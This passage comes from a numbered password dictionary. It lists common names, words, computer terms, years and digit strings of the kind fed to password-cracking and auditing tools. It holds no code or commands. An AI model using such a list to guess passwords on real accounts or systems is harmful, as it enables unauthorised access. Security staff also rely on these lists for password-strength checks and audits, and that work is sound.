1411 | soleil
1412 | sonics
1413 | sonny
1414 | sophie
1415 | space
1416 | spain
1417 | spanish
1418 | spanky
1419 | sparky
1420 | sparrow
1421 | special
1422 | speech
1423 | speedo
1424 | speedy
1425 | spencer
1426 | spider
1427 | spike
1428 | spirit
1429 | spitfire
1430 | spooky
1431 | sports
1432 | spring
1433 | sprite
1434 | spunky
1435 | squirt
1436 | ssssss
1437 | stacey
1438 | stanley
1439 | star
1440 | stargate
1441 | start
1442 | startrek
1443 | starwars
1444 | station
1445 | stealth
1446 | steele
1447 | steelers
1448 | stella
1449 | steph
1450 | stephani
1451 | stephen
1452 | steve
1453 | steven
1454 | stever
1455 | stimpy
1456 | sting
1457 | stingray
1458 | stinky
1459 | storm
1460 | stormy
1461 | strat
1462 | strawber
1463 | strider
1464 | stuart
1465 | student
1466 | studly
1467 | stupid
1468 | success
1469 | sugar
1470 | summer
1471 | sun
1472 | sunbird
1473 | sundance
1474 | sunday
1475 | sunflowe
1476 | sunny
1477 | sunrise
1478 | sunset
1479 | sunshin
1480 | sunshine
1481 | super
1482 | superman
1483 | support
1484 | supra
1485 | surf
1486 | surfer
1487 | susan
1488 | suzanne
1489 | suzuki
1490 | sweetie
1491 | sweetpea
1492 | sweets
1493 | sweety
1494 | swimmer
1495 | swimming
1496 | sydney
1497 | sylvia
1498 | sylvie
1499 | symbol
1500 | system
1501 | t-bone
1502 | tacobell
1503 | taffy
1504 | tamara
1505 | tammy
1506 | tandy
1507 | tango
1508 | tanker
1509 | tanner
1510 | tanya
1511 | tara
1512 | tardis
1513 | target
1514 | tarzan
1515 | tasha
1516 | tattoo
1517 | taurus
1518 | taylor
1519 | tazman
1520 | teacher
1521 | teachers
1522 | tech
1523 | techno
1524 | teddy
1525 | telecom
1526 | temp
1527 | temporal
1528 | tennis
1529 | tequila
1530 | teresa
1531 | terry
1532 | test
1533 | test123
1534 | tester
1535 | testing
1536 | testtest
1537 | texas
1538 | theatre
1539 | theboss
1540 | theking
1541 | theman
1542 | theresa
1543 | thomas
1544 | thumper
1545 | thunder
1546 | thunderb
1547 | thursday
1548 | thx
1549 | tiffany
1550 | tiger
1551 | tigers
1552 | tigger
1553 | tigre
1554 | tim
1555 | timber
1556 | time
1557 | timothy
1558 | tina
1559 | tinker
1560 | tinman
1561 | tintin
1562 | toby
1563 | today
1564 | tom
1565 | tomcat
1566 | tommy
1567 | tony
1568 | tootsie
1569 | topcat
1570 | topgun
1571 | topher
1572 | toronto
1573 | toyota
1574 | tractor
1575 | tracy
1576 | training
1577 | travel
1578 | travis
1579 | trebor
1580 | trek
1581 | trevor
1582 | tricia
1583 | trident
1584 | tristan
1585 | trixie
1586 | trouble
1587 | truck
1588 | trucks
1589 | trumpet
1590 | tucker
1591 | tuesday
1592 | turbo
1593 | turtle
1594 | tweety
1595 | twins
1596 | tyler
1597 | undead
1598 | unicorn
1599 | user1
1600 | utopia
1601 | vader
1602 | valentin
1603 | valerie
1604 | valhalla
1605 | vampire
1606 | vanessa
1607 | vanilla
1608 | velvet
1609 | venus
1610 | vermont
1611 | veronica
1612 | vette
1613 | vicky
1614 | victor
1615 | victoria
1616 | victory
1617 | video
1618 | viking
1619 | vikings
1620 | vincent
1621 | violet
1622 | viper
1623 | virginia
1624 | visa
1625 | vision
1626 | volley
1627 | volleyb
1628 | volvo
1629 | voodoo
1630 | voyager
1631 | walker
1632 | walleye
1633 | wally
1634 | walter
1635 | wanker
1636 | warcraft
1637 | warez
1638 | warner
1639 | warren
1640 | warrior
1641 | warriors
1642 | water
1643 | watson
1644 | wayne
1645 | weasel
1646 | webmaste
1647 | webster
1648 | weezer
1649 | welcome
1650 | wendy
1651 | wesley
1652 | western
1653 | whales
1654 | whateve
1655 | whatever
1656 | wheeling
1657 | wheels
1658 | whisky
1659 | white
1660 | whitney
1661 | wicked
1662 | wilbur
1663 | wildcat
1664 | william
1665 | williams
1666 | willie
1667 | willow
1668 | willy
1669 | wilson
1670 | win95
1671 | win98
1672 | win2000
1673 | win2k
1674 | windows
1675 | windsurf
1676 | winner
1677 | winnie
1678 | winnt
1679 | winston
1680 | winter
1681 | wisdom
1682 | wizard
1683 | wolf
1684 | wolfgang
1685 | wolfman
1686 | wolverin
1687 | wolves
1688 | wombat
1689 | wonder
1690 | woodland
1691 | woody
1692 | wqsb
1693 | wrangler
1694 | wrestle
1695 | wright
1696 | wwwwww
1697 | xanadu
1698 | xavier
1699 | xcountry
1700 | xfiles
1701 | xxx
1702 | xxxx
1703 | xxxxxx
1704 | yamaha
1705 | yankees
1706 | yellow
1707 | yoda
1708 | yomama
1709 | young
1710 | yvonne
1711 | zachary
1712 | zapata
1713 | zaphod
1714 | zebra
1715 | zenith
1716 | zephyr
1717 | zeppelin
1718 | zeus
1719 | zhongguo
1720 | ziggy
1721 | zombie
1722 | zorro
1723 | zxcvb
1724 | zxcvbnm
1725 | zzzzzz
1726 | computer
1727 | cpu
1728 | memory
1729 | disk
1730 | soft
1731 | y2k
1732 | software
1733 | cdrom
1734 | rom
1735 | admin
1736 | master
1737 | card
1738 | pci
1739 | lock
1740 | ascii
1741 | knight
1742 | creative
1743 | modem
1744 | internet
1745 | intranet
1746 | web
1747 | www
1748 | isp
1749 | unlock
1750 | ftp
1751 | telnet
1752 | ibm
1753 | intel
1754 | microsoft
1755 | dell
1756 | compaq
1757 | toshiba
1758 | acer
1759 | info
1760 | aol
1761 | 56k
1762 | server
1763 | dos
1764 | windows
1765 | win95
1766 | win98
1767 | office
1768 | word
1769 | excel
1770 | access
1771 | unix
1772 | linux
1773 | password
1774 | file
1775 | program
1776 | mp3
1777 | mpeg
1778 | jpeg
1779 | gif
1780 | bmp
1781 | billgates
1782 | chip
1783 | silicon
1784 | sony
1785 | link
1786 | word97
1787 | office97
1788 | network
1789 | ram
1790 | sun
1791 | yahoo
1792 | excite
1793 | hotmail
1794 | yeah
1795 | sina
1796 | pcweek
1797 | mac
1798 | apple
1799 | robot
1800 | key
1801 | monitor
1802 | win2000
1803 | office2000
1804 | word2000
1805 | net
1806 | virus
1807 | company
1808 | tech
1809 | technology
1810 | print
1811 | coolweb
1812 | guest
1813 | printer
1814 | superman
1815 | hotpage
1816 | enter
1817 | myweb
1818 | download
1819 | cool
1820 | coolman
1821 | coolboy
1822 | coolgirl
1823 | netboy
1824 | netgirl
1825 | log
1826 | login
1827 | connect
1828 | email
1829 | hyperlink
1830 | url
1831 | hotweb
1832 | java
1833 | cgi
1834 | html
1835 | htm
1836 | home
1837 | homepage
1838 | icq
1839 | mykey
1840 | c++
1841 | basic
1842 | delphi
1843 | pascal
1844 | anonymous
1845 | crack
1846 | hack
1847 | hacker
1848 | chinese
1849 | vcd
1850 | chat
1851 | chatroom
1852 | mud
1853 | cracker
1854 | happy
1855 | hello
1856 | room
1857 | english
1858 | user
1859 | netizen
1860 | frontpage
1861 | agp
1862 | netwolf
1863 | usa
1864 | hot
1865 | site
1866 | address
1867 | mail
1868 | news
1869 | topcool
1870 | 000
1871 | 0000
1872 | 001
1873 | 002
1874 | 007
1875 | 008
1876 | 10th
1877 | 1st
1878 | 2nd
1879 | 3rd
1880 | 4th
1881 | 5th
1882 | 6th
1883 | 7th
1884 | 8th
1885 | 9th
1886 | 100
1887 | 101
1888 | 108
1889 | 133
1890 | 163
1891 | 166
1892 | 188
1893 | 233
1894 | 266
1895 | 350
1896 | 366
1897 | 450
1898 | 466
1899 | 136
1900 | 137
1901 | 138
1902 | 139
1903 | 158
1904 | 168
1905 | 169
1906 | 192
1907 | 198
1908 | 200
1909 | 222
1910 | 233
1911 | 234
1912 | 258
1913 | 288
1914 | 300
1915 | 301
1916 | 333
1917 | 345
1918 | 388
1919 | 400
1920 | 433
1921 | 456
1922 | 458
1923 | 500
1924 | 555
1925 | 558
1926 | 588
1927 | 600
1928 | 666
1929 | 598
1930 | 668
1931 | 678
1932 | 688
1933 | 888
1934 | 988
1935 | 999
1936 | 1088
1937 | 1100
1938 | 1188
1939 | 1234
1940 | 1288
1941 | 1388
1942 | 1588
1943 | 1688
1944 | 1888
1945 | 1949
1946 | 1959
1947 | 1960
1948 | 1961
1949 | 1962
1950 | 1963
1951 | 1964
1952 | 1965
1953 | 1966
1954 | 1967
1955 | 1968
1956 | 1969
1957 | 1970
1958 | 1971
1959 | 1972
1960 | 1973
1961 | 1974
1962 | 1975
1963 | 1976
1964 | 1977
1965 | 1978
1966 | 1979
1967 | 1980
1968 | 1981
1969 | 1982
1970 | 1983
1971 | 1984
1972 | 1985
1973 | 1986
1974 | 1987
1975 | 1988
1976 | 1989
1977 | 1990
1978 | 1997
1979 | 1999
1980 | 2000
1981 | 2001
1982 | 2002
1983 | 2088
1984 | 2100
1985 | 2188
1986 | 2345
1987 | 2588
1988 | 3000
1989 | 3721
1990 | 3888
1991 | 4567
1992 | 4728
1993 | 5555
1994 | 5678
1995 | 5888
1996 | 6666
1997 | 6688
1998 | 6789
1999 | 6888
2000 | 7788
2001 | 8888
2002 | 8899
2003 | 9988
2004 | 9999
2005 | 12345
2006 | 23456
2007 | 34567
2008 | 45678
2009 | 54321
2010 | 88888
2011 | 123456
2012 | 654321
2013 | 888888
2014 | 6666
2015 | 56789
2016 | 1234567
2017 | 12345678
2018 | 737
2019 | 777
2020 | 1111
2021 | 2222
2022 | 3333
2023 | 4321
--------------------------------------------------------------------------------